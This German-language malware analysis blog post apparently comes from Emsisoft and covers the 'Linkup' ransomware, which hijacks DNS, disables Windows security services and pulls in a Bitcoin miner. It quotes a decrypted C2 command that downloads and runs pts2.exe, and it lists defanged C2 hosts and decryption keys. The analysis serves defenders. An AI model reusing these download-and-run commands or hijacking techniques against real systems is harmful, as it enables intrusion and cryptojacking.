Malware-Analyse: Ransomware „Linkup“ blockiert DNS und greift Bitcoins ab


locker-page-step3

Im Laufe der letzten Woche hat das Malware-Analystenteam von Emsisoft eine neue Ransomware und Trojaner-Variante verfolgt, die von Emsisoft Anti-Malware als Trojan-Ransom.Win32.Linkup erkannt wird.

„Linkup“ ist eine interessante Ransomware, da sie anders als früherer Varianten nicht direkt Ihren PC blockiert oder Dateien verschlüsselt.  Stattdessen blockiert Linkup den Internetzugang durch Veränderung Ihres DNS und kann ebenso Ihren Computer in einen Robot verwandeln, der Bitcoins abgreift.

 So schützen Sie sich gegen Linkup

Nutzer von Emsisoft Anti-Malware sind automatisch gegen Linkup geschützt und sollten das Programm blockieren, falls es als Trojan-Ransom.Win32.Linkup erkannt wird.  Nutzer, die mit Linkup infiziert wurden, werden vom Internet abgeschnitten und sehen die folgenden „Website“, wenn Sie im Internet surfen möchten.

locker-page-step1

Zu sehen ist das typische Ransomware-Formular, über das in diesem Fall persönliche Informationen und eine Zahlung zur Entsperrung des Internetzugangs gefordert werden.  Im Formular ist zu lesen, dass Ihnen lediglich 0,01 EUR berechnet werden, aber dies ist nicht bestätigt und höchstwahrscheinlich eine glatte Lüge.  Übermitteln Sie keinerlei persönliche Informationen!  Falls Ihr Computer infiziert wurde, raten wir Ihnen dazu, auf andere Weise Verbindung zum Internet aufzunehmen und sich an den Emsisoft-Support zu wenden, der Ihnen gerne bei der Entfernung hilft.

So funktioniert Linkup

Sobald der Linkup-Trojaner ausgeführt wird, erstellt er eine Kopie von sich selbst im Verzeichnis %AppData%MicrosoftWindows namens svchost.exe, eine gefälschte Kopie einer normalen Datei, die man üblicherweise im Verzeichnis %windir%system32 findet.  Um seine Anwesenheit im System zu melden, erstellt Linkup ein Mutex namens tnd990r oder tnd990s. Wir haben ebenso festgestellt, dass Linkup die Sicherheits- und Firewall-Dienste von Windows deaktiviert, um die Infektion zu erleichtern.

new-disable-services

Sobald sich Linkup auf Ihrem PC häuslich niedergelassen hat, kontaktiert er seinen Server und liefert ihm Daten über Ihren Rechner.  Dies erfolgt durch Senden einer POST-Anfrage an die folgenden Adresse, die verschlüsselt übertragen wird.

new-contacting-serverWelche Art von Daten sendet Linkup an den Server?  Entschlüsselt sieht der „Token“-Wert folgendermaßen aus:

uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU &wv=5.1.2600.SP3.0.256.1.2.x86&ia=1

Darum handelt es sich um Ihre Unique User ID (uid), Ihre Windows-Version (ver) und die Sprache, die Sie verwenden – hier ENU, also US-Englisch.  Diese Informationen erleichtern die Infektion, da Linkup wissen muss, auf welcher Art von Computer er läuft, um richtig zu funktionieren.

Linkup baut sich ebenfalls eine Redundanzschicht auf, sodass es selbst dann mit einem anderen Befehls- und Steuerserver kommunizieren kann, wenn ein Host ausfällt. Durch Entschlüsseln sehen wir die folgenden Befehl- und Steuerhosts:

hxxp://62.75.221.37/uplink.php?logo.jpg

hxxp://hoseen45r.com/uplink.php?logo.jpg

hxxp://onetimes21s.com/uplink.php?logo.jpg

hxxp://setpec14rs.com/uplink.php?logo.jpg

Linkup entschlüsselt den String mit dem folgenden Schlüssel:

IVW-Q3Xo5sBYzDTJK6LPuSrvEkAcghH8lw0GbfFe9dn_MRpqxONZam7ij2yUC14t

new-decrypt-body-string

Weitere Analysen von Linkup zeigen einen weiteren interessanten String, bei dem es sich in der Tat um einen weiteren Entschlüsselungskey handelt:

Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI

Dieser Key übersetzt Befehle vom Server von Linkup, damit die Malware diese ausführen kann. Bei der ersten Verbindung sieht der zuallererst gesendete Befehl wie folgt aus:

nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV

Linkup entschlüsselt diesen Befehl mit seinem Schlüssel hierzu:

IL 62.75.221.37 RUN hxxp://91.220.163.22/pts2.exe

decryption

Der erste Befehl (IL 62.75.221.37) leitet jede HTTP-Anfrage auf die Website der Ransomware um, die unter 62.75.221.37 zu finden ist, mit der Adresse hxxp://62.75.221.37/worlds/test/index.html. An diesem Punkt leitet Linkup Ihren DNS dann dermaßen um, dass Sie beim Surfen auf der Website der Ransomware landen.

Um jede einzelne DNS-Anfrage umzuleiten, nimmt Linkup auch ein paar Änderungen in der Registrierdatenbank von Windows vor, darunter die folgenden:

Linkup vollendet dann diese Aktionen durch Aktualisierung verschiedener Einstellungen Ihrer Internet- und Netzwerkverbindung, damit alle Veränderungen sofort übernommen werden.  Dazu werden die folgenden Befehle verwendet:

new-refresh-network

Diese Weiterleitung ist schon schlimm genug, aber Linkup geht interessanterweise noch weiter.  Beachten Sie die zweite Zeile des ursprünglichen Befehls des Servers: RUN hxxp://91.220.163.22/pts2.exe.  Dieser Befehl weist Ihren Computer an, die Datei pts2.exe herunterzuladen und auszuführen.  Was ist pts2.exe?  Ein Downloader, der Ihren Computer mit einem Botnet verbindet, das Bitcoins abgreift!

Ein Botnet, das Bitcoins abgreift?

Die technischen Vorgänge hinter dem „Abgreifen von Bitcoins“ sind komplex.  Eine gute Zusammenfassung bietet “Geeks Love The Bitcoin Phenomenon Like They Loved the Internet in 1995” von Ken Tiddel oder Angriff auf Bitcoins von Emsisoft.

Im Falle von Linkup ist der wichtigste Punkt, den Sie verstehen sollten, dass ein Hacker mehr Bitcoins verdienen kann, wenn er über mehr Rechenleistung verfügt.  Daher versucht Linkup – neben der Blockierung Ihres Internetzugangs –, Ihren Computer mit einem Bitcoin-Mining-Botnet zu verbinden, sodass die Rechenleistung mehrerer infizierter Computer dazu verwendet werden kann, den Hinternmännern des Angriffs neue Bitcoins einbringen kann.

Pts2.exe ist ein Downloader und wird im gleichen Verzeichnis wie die gefälschte svchost.exe platziert, mit der wir diese Analyse begonnen haben.  Hinter den Kulissen wird pts2.exe allerdings als Update_%random%.exe verarbeitet.  Dies ist eine .NET-basierte Datei zum Herunterladen und Ausführen einer weiteren Datei von hxxp://64.32.28.155/b.exe, die dann im Verzeichnis C:UsersPublicb.exe gespeichert wird.

pts2-downloaderIm weiteren Verlauf der Untersuchung fand unser Malware-Team heraus, dass es sich bei dieser „weiteren Datei“ um eine selbstextrahierende RAR-Datei handelt, die verschiedene Script-Dateien und eine ausführbare Datei entpackt.  Das SFX-Script führt eine 64-Bit-PE-Datei namens j.exe aus, nämlich jhProtominer. Wie der Name bereits suggeriert handelt es sich bei jhProtominer um eine Bitcoin-Mining-Anwendung.

Diese Verbindung aus Ransomware und Bitcoin-Mining ist eine neue und faszinierende Entwicklung.  Bisher ist diese Funktionalität noch recht beschränkt, denn die heruntergeladene Datei jhProtominer funktioniert nur in Systemen mit 64 Bit.  Im Laufe der Zeit werden weitere Veränderungen von Linkup interessant zu beobachten sein, mit denen flexiblere Varianten heruntergeladen werden können.

Hashes der in diesem Artikel analysierten Dateien

Was halten Sie von Linkup?

In den kommenden Wochen wird das Malware-Analystenteam Linkup aufmerksam verfolgen, da sich diese Malware mit großer Sicherheit weiterentwickeln wird. Wir stellen Ihnen diese Analyse bereit, da Linkup einen neuen Infektionsweg verfolgt, der zwei bekannte Techniken vereint – Ransomware und Bitcoin-Mining –, um eine leistungsstarke Malware zur Generierung von Einnahmen zu erzeugen.

Falls Sie Fragen zu Linkup haben sollten, wenden Sie sich am besten direkt an den Emsisoft-Support. Dort können Sie gerne Ihre Gedanken oder auch Ihre eigenen Erkenntnisse mitteilen, damit wir bei Emsisoft die Welt etwas sicherer von Malware machen können.  In der Zwischenzeit bleiben Sie sauber und eine gute (ransomware-freie) Zeit!

 

Abstrakt: Das Malware-Analystenteam von Emsisoft hat aufmerksam eine neue Ransomware und Trojaner-Variante verfolgt, die von Emsisoft Anti-Malware als Trojan-Ransom.Win32.Linkup erkannt wird.

Linkup kann Ihre DNS blockieren und Ihren PC in einen Bitcoin-Mining-Robot verwandeln!

Lesen Sie weiter und erfahren Sie mehr.

Senan Conrad

Weitere Artikel